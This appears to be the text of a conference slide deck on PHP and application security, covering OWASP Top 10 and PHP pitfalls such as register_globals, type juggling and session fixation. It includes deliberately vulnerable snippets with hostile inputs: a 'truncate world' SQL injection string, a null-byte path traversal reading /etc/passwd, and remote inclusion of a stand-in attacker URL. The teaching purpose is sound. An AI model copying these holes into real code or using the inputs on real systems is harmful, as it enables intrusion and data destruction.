Follow this topic:
@rjsmelo
PHP and Application Security
#owasp #php #appsec
RICARDO MELO

@rjsmelo 2
RICARDO MELO
● CTO @ DRI
● PHP, Mysql, Linux and lots of other
OSS
● ZCE, RHCE, LPI 3, ITIL, etc

1999 - 2013 DRI. Alguns direitos reservados. 3
Outline
● PHP Context
● Pain points
● Resources

1999 - 2013 DRI. Alguns direitos reservados. 4
OWASP - Builders, Breakers and Defenders
● Builders - https://www.owasp.org/index.php/Builders
● Breakers - https://www.owasp.org/index.php/Breakers
● Defenders - https://www.owasp.org/index.php/Defenders

1999 - 2013 DRI. Alguns direitos reservados. 5
What's PHP?
● PHP its a programming language
● As born as “Personal Home Page”, but
nowerdays is one of the most popular
programming language on/for the
internet.
● Gone away from it's roots and switch its
name to - PHP: Hypertext Preprocessor

1999 - 2013 DRI. Alguns direitos reservados. 6
PHP Anatomy
● The language “Core” (the if's e else's)
● The “official” libraries of functions
(extensions)
● Al the rest
– PEAR
– PECL
– Composer
– OSS libraries

1999 - 2013 DRI. Alguns direitos reservados. 7
What Makes PHP Popular
● Low entry barrier
● Imediate results
● The “instantaneous reward” factor for the
programmer
● Solves the problems It proposes to in
quick and effective way.

1999 - 2013 DRI. Alguns direitos reservados. 8
In fact it was been defined as ...
● Rasmus Lerdorf (the creator of PHP):
“PHP has never been just a scripting engine with some cool
add-ons. PHP has always been the solution to the Web problem
with even more bonus add-ons. And as I have said so many
times, PHP is not about purity in CS principles or architecture, it
is about solving the ugly web problem with an admittedly
ugly, but extremely functional and convenient solution. If
you are looking for purity you are in the wrong boat. Get out
now before you get hit by a wet cat!”

1999 - 2013 DRI. Alguns direitos reservados. 9
Ease of use?
● register_globals
● magic_quotes
● safe_mode
● open_basedir

1999 - 2013 DRI. Alguns direitos reservados. 10
Myths and Legends of PHP
● PHP is insecure
● But <insert your language here> its
secure
● Frameworks will solve all our security
problems

1999 - 2013 DRI. Alguns direitos reservados. 11
Myths and Legends of PHP (2)
● PHP is just for building some small sites.
● If you really want to build an enterprise
website/portal/webapp/etc then you must
use <enter your language here>

1999 - 2013 DRI. Alguns direitos reservados. 12
Information Security
“Information security means protecting information
and information systems from unauthorized access,
use, disclosure, disruption, modification, perusal,
inspection, recording or destruction”
(http://en.wikipedia.org/wiki/Information_security)

1999 - 2013 DRI. Alguns direitos reservados. 13
“Standard Approach”
“[...] we need to improve the security of
our software [...]”
● List of security Flaws
– OWASP top 10
– SANS top 25
– Valid for all programming language and genéric enough
● And a Book: “secure <your
programming language>”
● Code review & pen test & ...

1999 - 2013 DRI. Alguns direitos reservados. 14
Example: OWASP Top 10
● A1-Injection
● A2-Broken Authentication and Session
Management
● A3-Cross Site Scripting (XSS)
● A4-Insecure Direct Object References
● A5-Security Misconfiguration
● A6-Sensitive Data Exposure
● A7-Missing Function Level Access Control
● A8-Cross-Site Request Forgery (CSRF)
● A9-Using Components with Known
Vulnerabilities
● A10-Unvalidated Redirects and Forwards

1999 - 2013 DRI. Alguns direitos reservados. 15
PHP and (in)Security
● “With great power comes great
responsibility”
● The simplicity and flexibility of the
language often puts the programmers in
troubles
● The “shared hosting” has bring the “all in
the webroot” kind of applications to the
PHP world.
– Remember: except by server configuration all files are available
directly from the internet.

1999 - 2013 DRI. Alguns direitos reservados. 16
register_globals
● The Classic...
● All parameters passed to the script
(GET, POST, COOKIE, SERVER)
ends as globals.
// call: http://server/script.php?authorized=1
if ( some_function_to_chek($username,$password) {
$authorized = 1;
}
if ( ! $authorized ) {
exit;
}
// rest of the code

1999 - 2013 DRI. Alguns direitos reservados. 17
$_REQUEST
● $_REQUEST was a quick fix for
register_globals
● Uses the same processing order as
register_globals
● Instead of registering globals, registers
“keys” on the array $_REQUEST
● Mixing GET e POST can foster XSRF and
others.
● Most recommends direct access to $_GET &
$_POST to keep more control.

1999 - 2013 DRI. Alguns direitos reservados. 18
Case Sensitive & Type insensitive
● The first normally is not a problem...
● But type insensitive brings some
unexpected problems
$country = "1 ; truncate world;";
if ( $country > 0 ) {
mysql_query("delete from world where country = {$country}");
}
echo (int)$country; // 1
echo (string)$country; // 1; truncate world;

1999 - 2013 DRI. Alguns direitos reservados. 19
Type juggling & Type cast
● http://www.php.net/manual/en/language.types.type-
juggling.php
– Variable type is based on context
● If you add (+) the it's a int (or a float)
● If you use string concatenation (.) then is a string
● But you can force It!
– (int), (float), (string), (array), (object), (unset)
– settype
$country = "1 ; truncate world;";
settype($country,'integer');
echo (int)$country; // 1
echo (string)$country; // 1

1999 - 2013 DRI. Alguns direitos reservados. 20
PHP strings and .... C strings
● PHP uses a great amount of
libraries ... in C.
– “0” in PHP is one char as all the rest
– But in C it means the end of string
$file = $_GET['file']; // "../../etc/passwd0"
if (file_exists('/home/wwwrun/'.$file.'.php')) {
// file_exists will return true as the
// file /home/wwwrun/../../etc/passwd exists
include '/home/wwwrun/'.$file.'.php';
// the file /etc/passwd will be included
}

1999 - 2013 DRI. Alguns direitos reservados. 21
Streams
● PHP uses streams to access “files”.
● file:// — Accessing local filesystem
● http:// — Accessing HTTP(s) URLs
● ftp:// — Accessing FTP(s) URLs
● php:// — Accessing various I/O streams
● zlib:// — Compression Streams
● data:// — Data (RFC 2397)
● glob:// — Find pathnames matching pattern
● phar:// — PHP Archive
● ssh2:// — Secure Shell 2
● rar:// — RAR
● ogg:// — Audio streams
● expect:// — Process Interaction Streams

1999 - 2013 DRI. Alguns direitos reservados. 22
include / require
● include / require uses streams meaning
that you can include / require via “http”,
“ftp”, etc.
● Except if you disable allow_url_fopen
// $_GET['theme_path'] => http://some-host.xpto/nasty.php?
include "{$_GET['theme_path']}/header.inc";

1999 - 2013 DRI. Alguns direitos reservados. 23
The trendy .inc
● There was a trend of using .inc
● Only supersede by the "rename" to
.orig or .bak when doing live
"debugging" directly on the servers
● Normally if the file ends with “.php” the
file is processed by PHP, if it's
named .inc or .orig is handled as a
regular text file.

1999 - 2013 DRI. Alguns direitos reservados. 24
SQL Injections and Mysql
● Myth:
– The mysql extension is vurnerable to SQL injection
– To solve this you must use
● Mysqli
● PDO
● Fact:
– All extensions will allow you to do the queries that YOU want
– So, there is the possibility do do SQL injection in all
– The problem is between the chair and the keyboard
– In fact they refer to using prepared statements.

1999 - 2013 DRI. Alguns direitos reservados. 25
Session Magic
● session_start()
● It Just Works
● Session Fixation
– session.use_only_cookies (default 1 para o PHP5.3)
– session_regenerate_id()

1999 - 2013 DRI. Alguns direitos reservados. 26
Useful Resources
● http://www.php.net
● https://www.owasp.org/index.php/Top_Ten
● https://www.owasp.org/index.php/Cheat_Sheets
● https://www.owasp.org/index.php/PHP_Security_Ch
eat_Sheet (wip)
● https://www.owasp.org/index.php/OWASP_Zed_Att
ack_Proxy_Project
● https://www.owasp.org/index.php/OWASP_Guide_
Project

Follow this topic:
@rjsmelo
QA

www.dri-global.com
@rjsmelo
ricardo.melo@dri-global.com

Thank you